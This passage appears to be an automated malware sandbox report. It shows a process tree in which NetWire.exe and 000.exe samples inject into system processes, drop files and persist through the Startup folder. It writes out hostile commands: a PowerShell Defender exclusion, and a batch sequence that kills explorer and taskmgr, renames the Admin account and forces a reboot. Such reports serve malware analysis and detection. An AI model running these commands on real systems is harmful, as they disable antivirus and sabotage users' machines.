                                                                                                                                                                    10⤵
                                                                                                                                                                      PID:10172
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local
                                                                                                                                                                        11⤵
                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                        PID:6824
                                                                                                                                                        • C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                                                                          "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                                                                                                                                          4⤵
                                                                                                                                                            PID:13916
                                                                                                                                                      • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                        "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                        2⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:7156
                                                                                                                                                        • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                          "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                          3⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:5980
                                                                                                                                                          • C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                                                                            "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                                                                                                                                            4⤵
                                                                                                                                                              PID:8500
                                                                                                                                                        • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                          "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                          2⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:6400
                                                                                                                                                          • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                            "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:6928
                                                                                                                                                            • C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                                                                              "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:8992
                                                                                                                                                          • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                            "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                            2⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:4340
                                                                                                                                                            • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                              "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:6348
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6348 -s 76
                                                                                                                                                                4⤵
                                                                                                                                                                • Program crash
                                                                                                                                                                PID:6260
                                                                                                                                                          • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                            "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                            2⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:1996
                                                                                                                                                            • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                              "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                              PID:3008
                                                                                                                                                              • C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                                                                                "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:6632
                                                                                                                                                            • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                              "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                              2⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:7944
                                                                                                                                                              • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                                "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                                3⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:5524
                                                                                                                                                                • C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                                                                                  "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:8464
                                                                                                                                                              • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                                "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                                2⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:5960
                                                                                                                                                                • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                                  "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:5300
                                                                                                                                                                  • C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                                                                                    "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:11132
                                                                                                                                                                • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                                  "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:5284
                                                                                                                                                                  • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                                    "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    PID:2432
                                                                                                                                                                    • C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                                                                                      "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:9680
                                                                                                                                                                  • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                                    "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:7852
                                                                                                                                                                    • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                                      "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:7552
                                                                                                                                                                      • C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                                                                                        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:12908
                                                                                                                                                                    • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                                      "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:5708
                                                                                                                                                                      • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                                        "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:5692
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5692 -s 552
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:7612
                                                                                                                                                                    • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                                      "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:7056
                                                                                                                                                                      • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                                        "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:2436
                                                                                                                                                                    • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                                      "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:7040
                                                                                                                                                                      • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                                        "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                        PID:6160
                                                                                                                                                                        • C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                                                                                          "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:10512
                                                                                                                                                                      • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                                        "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:7288
                                                                                                                                                                        • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                                          "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                          PID:5764
                                                                                                                                                                          • C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                                                                                            "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:15232
                                                                                                                                                                        • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                                          "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:8064
                                                                                                                                                                          • C:\Users\Admin\Downloads\NetWire.exe
                                                                                                                                                                            "C:\Users\Admin\Downloads\NetWire.exe"
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                            PID:9132
                                                                                                                                                                            • C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                                                                                              "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:13400
                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3904 /prefetch:1
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:7928
                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4704 /prefetch:8
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              PID:6124
                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6560 /prefetch:1
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:10228
                                                                                                                                                                              • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                                                "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\BabylonToolbar.txt
                                                                                                                                                                                2⤵
                                                                                                                                                                                • Opens file in notepad (likely ransom note)
                                                                                                                                                                                PID:10348
                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6420 /prefetch:1
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:14260
                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7048 /prefetch:1
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:5624
                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6140 /prefetch:1
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:10936
                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:13540
                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1300 /prefetch:1
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:8136
                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3648 /prefetch:1
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:6604
                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6368 /prefetch:1
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:8488
                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:1
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:12176
                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:14312
                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:1
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:14232
                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1396 /prefetch:1
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:15824
                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6912 /prefetch:1
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:16156
                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6588 /prefetch:1
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:7064
                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6652 /prefetch:8
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                          PID:15316
                                                                                                                                                                                                        • C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                          "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\BabylonClient12.msi"
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                          PID:7180
                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2256 /prefetch:1
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:8048
                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4892 /prefetch:8
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:15660
                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6784 /prefetch:8
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:8180
                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6388 /prefetch:1
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:4316
                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5316 /prefetch:1
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:16248
                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3612 /prefetch:8
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:10256
                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:1180
                                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1404 /prefetch:8
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:14112
                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,10362614801824288952,8582434177305104446,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:8
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:7644
                                                                                                                                                                                                                          • C:\Users\Admin\Downloads\000.exe
                                                                                                                                                                                                                            "C:\Users\Admin\Downloads\000.exe"
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                                                            • Modifies WinLogon
                                                                                                                                                                                                                            • Sets desktop wallpaper using registry
                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                            PID:7944
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\windl.bat""
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:16164
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  taskkill /f /im explorer.exe
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                  PID:9252
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  taskkill /f /im taskmgr.exe
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                  PID:11196
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                  wmic useraccount where name='Admin' set FullName='UR NEXT'
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                  PID:6772
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                  wmic useraccount where name='Admin' rename 'UR NEXT'
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                  PID:13056
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shutdown.exe
                                                                                                                                                                                                                                  shutdown /f /r /t 0
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                    PID:15660
                                                                                                                                                                                                                            • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:1752
                                                                                                                                                                                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:3480
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                  PID:1876
                                                                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                    PID:536
                                                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                                                                                                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                      PID:1360
                                                                                                                                                                                                                                • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                                  C:\Windows\system32\AUDIODG.EXE 0x510 0x518
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:7108
